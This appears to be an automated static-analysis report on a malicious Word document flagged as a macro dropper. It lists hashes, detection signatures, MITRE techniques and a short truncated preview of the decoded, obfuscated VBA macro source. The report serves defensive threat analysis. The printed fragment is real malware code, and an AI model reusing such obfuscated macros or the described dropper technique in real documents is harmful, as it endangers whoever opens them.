Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a6f941fcec01fb00…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 81.5 KB
Created: 2018-09-02 19:19:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: b0684e4a309bcfa6e7bd6b0c633b78b7
SHA-1: 89c9280481f876e33785bde9489b6f7281e32cfc
SHA-256: a6f941fcec01fb006fc51df96396aeeb826cdf3864756669e19cb145fe41692f
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-7119458-0. Static analysis revealed the presence of VBA macros, including GetObject and CallByName functions, which are commonly used to execute malicious code. The macros are likely responsible for downloading and executing a second-stage payload, a common technique for droppers.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-7119458-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7119458-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    CallByName call
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18977 bytes
SHA-256: 2032fb96c11cfef7fde73b7907aff1e693f88005fa8859490f15674f3d7de1ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Layout, 0, 0, MSForms, Frame"
Dim dim62, dim53(2) As Byte, dim36(9) As Byte, dim37(32) As Byte, dim61(19) As Byte, dim50(13) As Byte, dim2(5) As Byte, dim06(55) As Byte, dim00(762) As Byte, dim10(5) As Byte
Private Sub dim42()
dim53(2) = 175
dim53(1) = 209
dim53(0) = 131
End Sub
Private Function dim6(dim1, dim72)
dim6 = dim1 - (dim72 * (dim1 \ dim72))
End Function
... (truncated)